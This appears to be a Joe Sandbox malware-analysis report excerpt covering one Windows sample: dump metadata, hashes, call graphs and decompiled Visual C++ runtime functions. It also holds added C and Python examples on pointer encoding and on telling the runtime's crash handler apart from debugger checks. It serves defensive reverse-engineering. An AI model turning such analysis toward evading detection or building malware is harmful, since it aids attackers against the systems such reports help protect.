• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_2f00000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: 787a79ba8fdcb2458ab572e43222ce13517b96fa179e1519929f2d4ec063d033
• Instruction ID: fe2313125f6ea66c6cb355b4bedc76b4a38ff161735baad3dbe1d8fc55cbd3eb
• Instruction Fuzzy Hash: 1011AD70B00214CFCB68EF78C545A6E7BE6EF896897054478C90AEB350EB39DC09CB91
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_2f00000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: 485681ad64b99c239330367cc2e4df658944789ba3a26fdebe6871a2d3f34911
• Instruction ID: 3d9a6dc63475d86bc8f5629c095fd47a85174bc43a192e49fcb83c74d00b3a91
• Instruction Fuzzy Hash: 6D01CD313093514FC359977498685AE3BE7AFCA1A931540FAD109DF3B2DE358C0687A6
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_2f00000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: b9e9d1415776253c042f5f2725cb721717b48fbbac66f5ce1de301bbc47642d8
• Instruction ID: dff255ad95054e7ca1a5f15e47f04d6fa1eaea0fcead15c0b27a487304bf2fbd
• Instruction Fuzzy Hash: 3CE0C2363002104F8358967EA88889BB7DEEFCC1B93150079F10EC7365DE71DC058790
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_2f00000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: 17eef53014dd376c84ed5b5426f1d423baa8b687b7ca66eac0c49cec87d6eb10
• Instruction ID: d867914bb08a0e5cdfe6f61742e574724af23e29a0483b8825b9b6625d970020
• Instruction Fuzzy Hash: A3C0126451A1908FD73457E0904C718351657E0248F014059A6124D8C4DF340808AB01
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_2f00000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: 438ef5c7d742f2fce319422b19ffa272fe13488daf4952561d669ea1af491ece
• Instruction ID: da16f402b692412301e3d530d6c7fc04aef3cf4c1ba90b7efe4171970134c9c4
• Instruction Fuzzy Hash: B3C0126851A2918FD33867E0908CB2C291A6BE0348F028059AA228E9C8DF340808AF12
• Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 1.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 19.3%
Total number of Nodes: 264
Total number of Limit Nodes: 6

The graph itself is a diagram on the original page; only its node labels and edges survive extraction, and the listing is cut off after node 403d70. The call chains that can be recovered from them (addresses as labelled by the sandbox, symbol names being its CRT annotations, "N API calls" its own node summaries):

• 407f20 -> 406340 -> 406270 (__encode_pointer, "7 API calls"): TlsGetValue, GetModuleHandleW (via 406310), GetProcAddress, RtlEncodePointer. 407f2b (__initp_misc_winsig, __init_pointers) -> 412e40 reaches the same routine. 406310 loops through 407970 (Sleep, GetModuleHandleW), which the sandbox labels __crt_wait_module_handle.
• 40bfa0 (__heap_init): HeapCreate, HeapAlloc (40d260), HeapDestroy.
• 4020e0 -> 40ae40: GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter (the sequence MSVC's __security_init_cookie uses to seed the /GS stack cookie).
• 404e40 and 404520 -> 404770 (__invoke_watson, "10 API calls"): __VEC_memzero (404670), IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, __invalid_parameter, GetCurrentProcess, TerminateProcess. 40ee60 (_ValidateLocalCookies, "5 API calls"): IsDebuggerPresent -> 40c9d0 -> 4172ef: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess.
• 40d060 (__free_base, ___sbh_find_block): HeapFree, GetLastError; 40d390: VirtualFree, then VirtualFree and HeapFree, then 4166a0 (__VEC_memcpy); 40d0f5 -> 40abf0: LeaveCriticalSection.
• 406920: InterlockedDecrement, then LeaveCriticalSection via 40abf0.
• 408020 (__except_handler4, __IsNonwritableInCurrentImage): _ValidateLocalCookies (4081e0 -> 40ee60), RtlUnwind (41318a).
• 4163c0 -> 404700 (__invalid_parameter, "16 API calls"): 406360 (TlsGetValue, __crt_wait_module_handle via 406310, GetProcAddress), then __invoke_watson.
• 416480: LoadLibraryA, then five GetProcAddress lookups, each result passed through __encode_pointer (406270).
• 417b80 -> 417800 -> 4174b0: _memset, _strlen, __isleadbyte_l, _LocaleUpdate, MultiByteToWideChar (three call sites), GetLastError.
• 412e60 -> 41a780: _memset, SetUnhandledExceptionFilter, UnhandledExceptionFilter; then 407a90 -> 407c80 (_doexit, __initterm) -> 407f00 (LeaveCriticalSection) -> 407ec0: ExitProcess.
• 40a910 -> 412fc0: InitializeCriticalSectionAndSpinCount.
• 406410: TlsGetValue, TlsSetValue.
• 403d70: label only; the listing ends here.

Every chain above is Visual C++ runtime startup, error-reporting or shutdown code, which fits the 1.6% execution coverage: the graph shows none of the payload's own logic. In particular, the IsDebuggerPresent calls sit in the CRT's fatal-error paths (__invoke_watson and the _ValidateLocalCookies failure path), where the runtime checks for an attached debugger before reporting the fault and terminating; they are not an anti-analysis check by the sample.
403d7c ___sbh_verify_block 1750->1751 1752 403d83 __CrtIsValidHeapPointer 1750->1752 1752->1751 1753 403df0 HeapValidate 1752->1753 1754 403da7 ___sbh_find_block 1752->1754 1753->1751 1754->1751 1755 403dd6 HeapValidate 1754->1755 1755->1751 1756 406b30 1757 406b3e 1756->1757 1758 406bb4 _memset 1757->1758 1759 406b84 1757->1759 1761 406c49 1758->1761 1764 406c79 _memset 1758->1764 1760 404700 __invalid_parameter 16 API calls 1759->1760 1763 406ba7 _memset 1760->1763 1762 404700 __invalid_parameter 16 API calls 1761->1762 1762->1763 1764->1763 1765 404700 __invalid_parameter 16 API calls 1764->1765 1765->1763 1598 412250 1599 41225e 1598->1599 1600 4122bd 1599->1600 1603 4122ed _memset 1599->1603 1605 41226a _memset 1599->1605 1601 404700 __invalid_parameter 16 API calls 1600->1601 1601->1605 1602 4123e4 1604 404700 __invalid_parameter 16 API calls 1602->1604 1603->1602 1603->1605 1606 412414 _memset _strncpy_s 1603->1606 1604->1605 1606->1605 1607 404700 __invalid_parameter 16 API calls 1606->1607 1607->1605 1608 4126d0 1610 4126de 1608->1610 1609 412724 1612 404700 __invalid_parameter 16 API calls 1609->1612 1610->1609 1611 412754 _memset 1610->1611 1613 4127e9 1611->1613 1617 412819 _memset 1611->1617 1615 412747 _memset 1612->1615 1614 404700 __invalid_parameter 16 API calls 1613->1614 1614->1615 1616 4128f4 1619 404700 __invalid_parameter 16 API calls 1616->1619 1617->1616 1618 412924 _memset 1617->1618 1618->1615 1620 404700 __invalid_parameter 16 API calls 1618->1620 1619->1615 1620->1615 1766 40fab5 1769 40abf0 LeaveCriticalSection 1766->1769 1768 40fabc 1769->1768 1770 4130f8 1771 41310a 1770->1771 1773 413118 @_EH4_CallFilterFunc@8 1770->1773 1772 40ee60 _ValidateLocalCookies 5 API calls 1771->1772 1772->1773 1634 40fc1f 1635 40fc30 1634->1635 1636 40fc25 InterlockedDecrement 1634->1636 1636->1635

                                                                                                          Callgraph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          • Opacity -> Relevance
                                                                                                          • Disassembly available
                                                                                                          The callgraph is a node/edge listing from the interactive viewer and is summarized here: 90 functions of the 0x400000 image, Function_004013F0 through Function_0041A9E8, with their call edges. Edges that matter for reading this report: Function_004020E0 (the entry point) calls Function_0040AE40 (___security_init_cookie); Function_00406340 calls Function_00406270 (__encode_pointer); Function_0040EE60 (cookie check and GS failure report) calls Function_0040C9D0 and is reached from Function_004081E0, Function_00404770 and Function_004130F8; Function_00407C80 (the _doexit path) reaches Function_00407EC0 (ExitProcess); Function_00412E60 calls Function_0041A780, which in turn calls Function_00407A90 and Function_00410930.

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          Basic blocks: 0 at 0x00406340-0x00406347 (call 0x00406270) -> 2 at 0x0040634c-0x00406350
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00406340() {   // CRT __encoded_null(): NULL run through __encode_pointer, the value the CRT stores in empty function-pointer slots
                                                                                                          				void* _t1;

                                                                                                          				_t1 = E00406270(0); // executed; E00406270 is __encode_pointer (TlsGetValue, GetProcAddress("EncodePointer"), RtlEncodePointer, see APIs below)
                                                                                                          				return _t1;
                                                                                                          			}

                                                                                                          Instruction addresses (in statement order): 0x00406347, 0x00406350

                                                                                                          APIs
                                                                                                          • __encode_pointer.LIBCMTD ref: 00406347
                                                                                                            • Part of subcall function 00406270: TlsGetValue.KERNEL32(00000001), ref: 00406285
                                                                                                            • Part of subcall function 00406270: TlsGetValue.KERNEL32(00000001,00000001), ref: 004062A6
                                                                                                            • Part of subcall function 00406270: __crt_wait_module_handle.LIBCMTD ref: 004062BC
                                                                                                            • Part of subcall function 00406270: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004062D6
                                                                                                            • Part of subcall function 00406270: RtlEncodePointer.NTDLL(?), ref: 004062F7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.465874772.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.465862526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465922595.0000000000427000.00000004.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465935735.0000000000428000.00000008.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465983851.000000000044F000.00000004.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.467673993.00000000023B8000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_0fd7de5367376231a788872005d7ed4f.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$AddressEncodePointerProc__crt_wait_module_handle__encode_pointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 568403282-0
                                                                                                          • Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                          • Instruction ID: 31428026cba3fa05dafd68cb6998487dd02dbad78c73646dc55d5d451d242297
                                                                                                          • Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                          • Instruction Fuzzy Hash: ACA012A244420833D40030833803F02350C43C1738E090075F50D051826852A4244097
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%
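
                                                                                                          E00406340 is the CRT's __encoded_null(): NULL run through __encode_pointer, which (as the APIs above show) resolves EncodePointer at run time because the static CRT must also load on systems that lack it. As an added example that is not from the Joe Sandbox report and not the sample's own code, the C below re-creates why the CRT keeps its function-pointer tables (atexit entries, the unhandled-exception filter and the like) in encoded form and why the empty-slot sentinel is the encoded NULL rather than zero. Windows does not document the transform RtlEncodePointer applies; the XOR-then-rotate scheme, the process_secret value, the four-slot table and every function name here are this example's own stand-ins.

```c
/* Added example, not code from the Joe Sandbox report or from the sample:
 * a stand-in for the EncodePointer/DecodePointer pair that E00406270 resolves
 * and that E00406340 (__encoded_null) applies to NULL. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

typedef void (*handler_fn)(void);

/* Constructed per-process secret. Windows keeps the real one in the kernel and
 * the CRT never reads it, which is the point: nothing in the image reveals it. */
static uint64_t process_secret;

void init_pointer_secret(uint64_t seed) {
    process_secret = seed ? seed : 1;   /* zero would make encode() the identity */
}

static uint64_t rotr64(uint64_t v, unsigned n) { n &= 63; return n ? (v >> n) | (v << (64 - n)) : v; }
static uint64_t rotl64(uint64_t v, unsigned n) { n &= 63; return n ? (v << n) | (v >> (64 - n)) : v; }

/* Assumed transform (not the documented one): XOR with the secret, then rotate
 * by a secret-derived amount, so even NULL encodes to a non-zero value that an
 * attacker cannot predict without the secret. */
uint64_t encode_pointer(uint64_t p) { return rotr64(p ^ process_secret, (unsigned)(process_secret & 63)); }
uint64_t decode_pointer(uint64_t e) { return rotl64(e, (unsigned)(process_secret & 63)) ^ process_secret; }

/* What E00406340 computes: the sentinel the CRT writes into an empty slot. */
uint64_t encoded_null(void) { return encode_pointer(0); }

/* A CRT-style table of callbacks held in encoded form (hypothetical layout). */
#define TABLE_SLOTS 4
static uint64_t callback_table[TABLE_SLOTS];
static int fired;                                /* how often the demo callback ran */
static void demo_callback(void) { fired++; }

void table_init(void) {
    for (size_t i = 0; i < TABLE_SLOTS; i++) callback_table[i] = encoded_null();
}

/* Store fn, encoded, in the first free slot; returns the slot index or -1. */
int table_register(handler_fn fn) {
    for (size_t i = 0; i < TABLE_SLOTS; i++) {
        if (callback_table[i] == encoded_null()) {
            callback_table[i] = encode_pointer((uint64_t)(uintptr_t)fn);
            return (int)i;
        }
    }
    return -1;
}

/* Decode and call every occupied slot, as _doexit does; returns the count called. */
int table_run(void) {
    int ran = 0;
    for (size_t i = 0; i < TABLE_SLOTS; i++) {
        if (callback_table[i] == encoded_null()) continue;
        handler_fn fn = (handler_fn)(uintptr_t)decode_pointer(callback_table[i]);
        fn();
        ran++;
    }
    return ran;
}

int demo_fired_count(void) { return fired; }

/* The attacker's case: a raw, unencoded address written into a slot (what a
 * data-section or heap overwrite would plant) decodes to an unrelated value.
 * The CRT cannot detect the corruption, but it cannot be steered to the
 * attacker's address either. */
int raw_overwrite_redirects(uint64_t raw_address) {
    return decode_pointer(raw_address) != raw_address;
}

int main(void) {
    init_pointer_secret(0x5ed618d6a129e729ull);   /* constructed secret */
    table_init();
    table_register(demo_callback);
    printf("encoded NULL = 0x%016llx, callbacks run = %d\n",
           (unsigned long long)encoded_null(), table_run());
    printf("raw 0x401000 in a slot decodes to 0x%016llx\n",
           (unsigned long long)decode_pointer(0x401000));
    return 0;
}
```

                                                                                                          The comparison in table_register and table_run is against encoded_null(), never against 0: with the secret applied, a zero word in the table would itself decode to a non-NULL address, which is why the CRT initialises these tables through __encoded_null rather than by zeroing them.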

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          Basic blocks: 3 at 0x004020e0-0x004020e5 (call 0x0040ae40) -> 5 at 0x004020ea (call 0x00402100)
                                                                                                          C-Code - Quality: 100%
                                                                                                          			_entry_() {   // PE entry point: set up the /GS cookie before any protected frame exists, then hand over to the CRT start-up routine
                                                                                                          				void* _t3;
                                                                                                          				void* _t4;

                                                                                                          				E0040AE40(); // executed; ___security_init_cookie (see APIs below)
                                                                                                          				return L00402100(_t3, _t4);   // tail call into the CRT start-up proper; _t3/_t4 are decompiler placeholders for the incoming registers
                                                                                                          			}

                                                                                                          Instruction addresses (in statement order): 0x004020e5, 0x004020f0

                                                                                                          APIs
                                                                                                          • ___security_init_cookie.LIBCMTD ref: 004020E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.465874772.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.465862526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465922595.0000000000427000.00000004.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465935735.0000000000428000.00000008.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465983851.000000000044F000.00000004.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.467673993.00000000023B8000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_0fd7de5367376231a788872005d7ed4f.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___security_init_cookie
                                                                                                          • String ID:
                                                                                                          • API String ID: 3657697845-0
                                                                                                          • Opcode ID: e5dd8bf813fb517254f84b6b6e16f20edad6374c86a69e55565686c8cf0eafea
                                                                                                          • Instruction ID: 621c916d810ec99fe97919bae27be7f93347b28545652bcd38ca6aa05a212a64
                                                                                                          • Opcode Fuzzy Hash: e5dd8bf813fb517254f84b6b6e16f20edad6374c86a69e55565686c8cf0eafea
                                                                                                          • Instruction Fuzzy Hash: 33A0022104475816915033A7454FE0A754E48C4718795003A7718261C31DFCA81140EF
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 85%
                                                                                                          			/* Decompiler output. This is the static debug CRT's (LIBCMTD) __security_check_cookie at 0x40ee60 with the
                                                                                                          			 * decompiler following the failure branch into __report_gsfailure at 0x41722b: ecx carries the frame's cookie,
                                                                                                          			 * a match returns, a mismatch saves the registers into the CRT's GS_ContextRecord (base 0x44fdc8), builds a
                                                                                                          			 * STATUS_STACK_BUFFER_OVERRUN record and terminates without unwinding. The IsDebuggerPresent call here is
                                                                                                          			 * CRT crash-reporting logic, not anti-analysis behaviour of the sample. */
                                                                                                          			E0040EE60(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                          				intOrPtr _v0;
                                                                                                          				void* _v804;
                                                                                                          				intOrPtr _v808;
                                                                                                          				intOrPtr _v812;
                                                                                                          				intOrPtr _t6;
                                                                                                          				intOrPtr _t11;
                                                                                                          				long _t15;
                                                                                                          				intOrPtr _t19;
                                                                                                          				intOrPtr _t20;
                                                                                                          				intOrPtr _t21;
                                                                                                          				intOrPtr _t22;
                                                                                                          				intOrPtr _t23;
                                                                                                          				intOrPtr _t24;
                                                                                                          				intOrPtr _t25;
                                                                                                          				intOrPtr* _t29;
                                                                                                          				void* _t34;

                                                                                                          				_t25 = __esi;
                                                                                                          				_t24 = __edi;
                                                                                                          				_t22 = __edx;
                                                                                                          				_t20 = __ecx;
                                                                                                          				_t19 = __ebx;
                                                                                                          				_t6 = __eax;
                                                                                                          				_t34 = _t20 -  *0x4277e4; // 0xa129e729 = __security_cookie; ecx holds the cookie read back from the frame
                                                                                                          				if(_t34 == 0) {
                                                                                                          					asm("repe ret"); // cookie intact: normal return (the rep prefix is a branch-predictor workaround, not data)
                                                                                                          				}
                                                                                                          				 *0x44fe78 = _t6;   // GS_ContextRecord.Eax
                                                                                                          				 *0x44fe74 = _t20;  // .Ecx
                                                                                                          				 *0x44fe70 = _t22;  // .Edx
                                                                                                          				 *0x44fe6c = _t19;  // .Ebx
                                                                                                          				 *0x44fe68 = _t25;  // .Esi
                                                                                                          				 *0x44fe64 = _t24;  // .Edi
                                                                                                          				 *0x44fe90 = ss;    // .SegSs
                                                                                                          				 *0x44fe84 = cs;    // .SegCs
                                                                                                          				 *0x44fe60 = ds;    // .SegDs
                                                                                                          				 *0x44fe5c = es;    // .SegEs
                                                                                                          				 *0x44fe58 = fs;    // .SegFs
                                                                                                          				 *0x44fe54 = gs;    // .SegGs
                                                                                                          				asm("pushfd");
                                                                                                          				_pop( *0x44fe88);   // .EFlags
                                                                                                          				 *0x44fe7c =  *_t29;  // .Ebp = saved frame pointer of the failing function
                                                                                                          				 *0x44fe80 = _v0;     // .Eip = its return address
                                                                                                          				 *0x44fe8c =  &_a4;   // .Esp
                                                                                                          				 *0x44fdc8 = 0x10001; // .ContextFlags = CONTEXT_CONTROL
                                                                                                          				_t11 =  *0x44fe80; // 0x0
                                                                                                          				 *0x44fd7c = _t11;        // GS_ExceptionRecord.ExceptionAddress = Eip
                                                                                                          				 *0x44fd70 = 0xc0000409;  // .ExceptionCode = STATUS_STACK_BUFFER_OVERRUN
                                                                                                          				 *0x44fd74 = 1;           // .ExceptionFlags = EXCEPTION_NONCONTINUABLE
                                                                                                          				_t21 =  *0x4277e4; // 0xa129e729 = __security_cookie
                                                                                                          				_v812 = _t21;
                                                                                                          				_t23 =  *0x4277e8; // 0x5ed618d6 = __security_cookie_complement (bitwise NOT of the cookie, so the dump is self-consistent)
                                                                                                          				_v808 = _t23;      // both copied to the stack so they land in the crash dump
                                                                                                          				 *0x44fdc0 = IsDebuggerPresent(); // remembered to decide whether the debugger hook must be re-invoked after Watson
                                                                                                          				_push(1);
                                                                                                          				E0040C9D0(_t12);   // _crt_debugger_hook(_CRT_DEBUGGER_GSFAILURE)
                                                                                                          				SetUnhandledExceptionFilter(0);   // drop any filter the program installed so it cannot swallow the report
                                                                                                          				_t15 = UnhandledExceptionFilter(0x423f00);   // 0x423f00 = GS_ExceptionPointers (record + context above)
                                                                                                          				if( *0x44fdc0 == 0) {
                                                                                                          					_push(1);
                                                                                                          					E0040C9D0(_t15);
                                                                                                          				}
                                                                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409); // no unwinding: a smashed frame cannot be trusted to run handlers
                                                                                                          			}

                                                                                                          Instruction addresses (in statement order): 0x0040ee60, 0x0040ee66, 0x0040ee68 (cookie compare and repe ret); 0x0041722b, 0x00417230, 0x00417236, 0x0041723c, 0x00417242, 0x00417248, 0x0041724e, 0x00417255, 0x0041725c, 0x00417263, 0x0041726a, 0x00417271, 0x00417278, 0x00417279, 0x00417282, 0x0041728a, 0x00417292, 0x0041729d, 0x004172a7, 0x004172ac, 0x004172b1, 0x004172bb, 0x004172c5, 0x004172cb, 0x004172d1, 0x004172d7, 0x004172e3, 0x004172e8, 0x004172ea, 0x004172f4, 0x004172ff, 0x0041730c, 0x0041730e, 0x00417310, 0x00417315, 0x0041732d (__report_gsfailure body)

                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 004172DD
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004172F4
                                                                                                          • UnhandledExceptionFilter.KERNEL32(00423F00), ref: 004172FF
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0041731D
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00417324
                                                                                                          Note: this call sequence (IsDebuggerPresent, SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter on a static EXCEPTION_POINTERS, then TerminateProcess(GetCurrentProcess(), 0xC0000409)) matches the MSVC CRT's /GS stack-cookie failure handler (__raise_securityfailure, reached from __report_gsfailure); 0xC0000409 is STATUS_STACK_BUFFER_OVERRUN. It is compiler-inserted runtime code, so the IsDebuggerPresent here is not on its own evidence that the sample checks for a debugger.
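The five calls above identify the function by its API shape alone. The following Python is added here by the editor and is not part of the Joe Sandbox report: it parses "APIs" lines in the report's own format and separates the CRT /GS failure handler (SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess in that order, plus the 0xC0000409 constant somewhere in the function) from a function that merely calls IsDebuggerPresent. The first sample is the five report lines copied from above; the second sample is constructed, and the function and constant names are the author's own.

```python
import re

# One line of the report's "APIs" field, e.g.
#   • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004172F4
API_LINE = re.compile(
    r"(?P<name>\w+)\.(?P<module>\w+)"      # name.MODULE
    r"(?:\((?P<args>[^)]*)\))?,?\s*"       # optional (arg, arg, ...)
    r"ref:\s*(?P<ref>[0-9A-Fa-f]+)"        # call-site address
)

STATUS_STACK_BUFFER_OVERRUN = 0xC0000409
# The CRT's /GS failure path issues these four calls in this order
# (IsDebuggerPresent sits in front of them in the same routine).
GS_FAILURE_SEQUENCE = (
    "SetUnhandledExceptionFilter",
    "UnhandledExceptionFilter",
    "GetCurrentProcess",
    "TerminateProcess",
)

# Copied from the report's "APIs" field above.
REPORT_APIS = """\
• IsDebuggerPresent.KERNEL32 ref: 004172DD
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004172F4
• UnhandledExceptionFilter.KERNEL32(00423F00), ref: 004172FF
• GetCurrentProcess.KERNEL32(C0000409), ref: 0041731D
• TerminateProcess.KERNEL32(00000000), ref: 00417324
"""

# Constructed counter-example: a debugger check that is not the CRT handler.
CONSTRUCTED_ANTIDEBUG = """\
• IsDebuggerPresent.KERNEL32 ref: 00401000
• ExitProcess.KERNEL32(00000001), ref: 00401010
"""


def parse_api_field(text):
    """Return the calls as dicts, ordered by call-site address."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",") if a.strip()]
        calls.append({"name": m.group("name"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return sorted(calls, key=lambda c: c["ref"])


def _in_order(names, wanted):
    """True if every name in `wanted` occurs in `names` in that order (gaps allowed)."""
    it = iter(names)
    return all(any(n == w for n in it) for w in wanted)


def is_gs_failure_handler(calls):
    names = [c["name"] for c in calls]
    # The report attaches the constant to whichever call its argument heuristic
    # picked (here GetCurrentProcess), so look for it anywhere in the function.
    consts = {int(a, 16) for c in calls for a in c["args"]
              if re.fullmatch(r"[0-9A-Fa-f]+", a)}
    return _in_order(names, GS_FAILURE_SEQUENCE) and STATUS_STACK_BUFFER_OVERRUN in consts


def classify_function(text):
    calls = parse_api_field(text)
    if is_gs_failure_handler(calls):
        return "crt_gs_failure_handler"
    if any(c["name"] in ("IsDebuggerPresent", "CheckRemoteDebuggerPresent") for c in calls):
        return "debugger_check"
    return "other"
```

Running `classify_function(REPORT_APIS)` labels the function above as the CRT handler, while the constructed sample is reported as a genuine debugger check; the order test matters, because the same four APIs in a different order are not the CRT routine.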
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.465874772.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.465862526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465922595.0000000000427000.00000004.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465935735.0000000000428000.00000008.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.465983851.000000000044F000.00000004.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000007.00000002.467673993.00000000023B8000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_0fd7de5367376231a788872005d7ed4f.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 2579439406-0
                                                                                                          • Opcode ID: d77ef2986b6ece57a3f22b9b6c88b6234d9d2aa024e6ed81b53eb45df935dbbe
                                                                                                          • Instruction ID: 0e68da6c3980ea9961357d55aa9078e6f7cd450385757b10095ee43c89e96804
                                                                                                          • Opcode Fuzzy Hash: d77ef2986b6ece57a3f22b9b6c88b6234d9d2aa024e6ed81b53eb45df935dbbe
                                                                                                          • Instruction Fuzzy Hash: E321DEBD900604DBD3009F66FD446853BB0BB1A312FA0513AE90993372E7B5A989CB4D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage: 4.2%
                                                                                                          Dynamic/Decrypted Code Coverage: 100%
                                                                                                          Signature Coverage: 0%
                                                                                                          Total number of Nodes: 19
                                                                                                          Total number of Limit Nodes: 0
                                                                                                          execution_graph 1411 c20368 1412 c20387 1411->1412 1414 c2095b QueryBSDRWindow 1412->1414 1415 c20968 QueryBSDRWindow 1412->1415 1413 c20425 1414->1413 1415->1413 1395 c20889 1396 c208a5 QueryBSDRWindow 1395->1396 1397 c208be 1396->1397 1398 c203bd 1399 c203c4 1398->1399 1403 c2095b 1399->1403 1407 c20968 1399->1407 1400 c20425 1404 c2098c 1403->1404 1405 c20a20 QueryBSDRWindow 1404->1405 1406 c20a2e 1404->1406 1405->1406 1406->1400 1408 c2098c 1407->1408 1409 c20a20 QueryBSDRWindow 1408->1409 1410 c20a2e 1408->1410 1409->1410 1410->1400

                                                                                                          Callgraph

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
